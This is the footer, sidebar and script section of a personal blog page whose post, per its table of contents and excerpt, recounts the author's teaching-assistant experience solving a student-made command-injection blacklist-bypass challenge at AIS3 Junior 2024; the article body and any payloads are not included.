        <span id="busuanzi_container_site_uv">Number of visitors&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
    
  </div>
</footer>

        
          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">Contents</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#AIS3-Junior-2024-command-injection-bypass-master"><span class="toc-number">1.</span> <span class="toc-text">AIS3 Junior 2024-command injection bypass master</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AD%B8%E5%93%A1%E7%9A%84%E5%B0%88%E9%A1%8C"><span class="toc-number">1.2.</span> <span class="toc-text">學員的專題</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Final-payload"><span class="toc-number">1.2.1.</span> <span class="toc-text">Final payload</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#vincent%E7%9A%84payload"><span class="toc-number">1.3.</span> <span class="toc-text">vincent的payload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A3%93payload"><span class="toc-number">1.4.</span> <span class="toc-text">壓payload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BE%8C%E8%A8%98"><span class="toc-number">1.5.</span> <span class="toc-text">後記</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
      <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Naup堇姬" class="lazyload">
  <div class="sidebar-author-name">Naup堇姬</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Posts</div>
    <div class="sidebar-state-number">58</div>
  </div>
  <div class="sidebar-state-category">
    <div>Categories</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>Tags</div>
    <div class="sidebar-state-number">16</div>
  </div>
</div>
<div class="sidebar-social">
  
    <div class="icon-email sidebar-social-icon">
      <a href=naup96721@gmail.com itemprop="url" target="_blank" aria-label="email" rel="noopener external nofollow noreferrer"></a>
    </div>
  
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/Naupjjin itemprop="url" target="_blank" aria-label="github" rel="noopener external nofollow noreferrer"></a>
    </div>
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="Home"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">Home</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="Archives"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">Archives</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="About"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">About</div>
      </div>
    
  
</div>
</div>
    
  </div>
  
    <div class="sidebar-btn-wrapper">
      <div class="sidebar-toc-btn current"></div>
      <div class="sidebar-common-btn"></div>
    </div>
  
</nav>

    </div>
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>



<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>







  
<script src="https://npm.webcache.cn/mouse-firework@0.0.6/dist/index.umd.js" integrity="sha384-vkGvf25gm1C1PbcoD5dNfc137HzNL&#x2F;hr1RKA5HniJOaawtvUmH5lTVFgFAruE9Ge" crossorigin="anonymous"></script>

  <script>
    window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["#ff5252","#ff7c7c","#ffafaf","#ffd0d0"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["#ff0000"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>










<div id="lazy-script">
  <div>
    
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "Naup堇姬",
          title: "AIS3 Junior 2024-command injection bypass master",
          url: "http://example.com/2024/08/19/AIS3-Junior-2024-command-injection-bypass-master/",
          excerpt: "",
          description: "",
          stripContent: "AIS3 Junior 2024-command injection bypass master Author: 堇姬Naup  前言這次去AIS3 junior當了助教，也是我第一次當助教，這次跟vincent一起擔任A組的助教，本篇記錄了一些我們學員專題題目，我的解題及vincent的解題方法 學員的專題這次A組的學員挑的專題是針對command injection加入了更多黑名單bypass的方法，他們出完很開心的拿來給我跟vincent玩，結果我們問他們有沒有官解他們說沒有www，不過這",
          date: "Mon Aug 19 2024 12:07:53 GMT+0800",
          updated: "Mon Aug 19 2024 12:13:19 GMT+0800",
          cover: "https://i.imgur.com/OjUqWVO.jpeg",
        };
      </script>
       
    
    
      
        
<script src="/js/insert_highlight.js" data-pjax></script>

        
      
    
    
      <script type="module" data-pjax>
        const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
        
        const pswp = () => {
          if (_$$('.article-entry a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-entry',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          if(_$$('.article-gallery a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-gallery',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          window.lightboxStatus = 'done';
          window.removeEventListener('lightbox:ready', pswp);
        }
        if(window.lightboxStatus === 'ready') {
          pswp()
        } else {
          window.addEventListener('lightbox:ready', pswp);
        }
      </script>
      








    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.3.0' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  



  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" integrity="sha384-0M75wtSkhjIInv4coYlaJU83+OypaRCIq2SukQVQX04eGTCBXJDuWAbJet56id+S" crossorigin="anonymous" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>







  </body>
  </html>

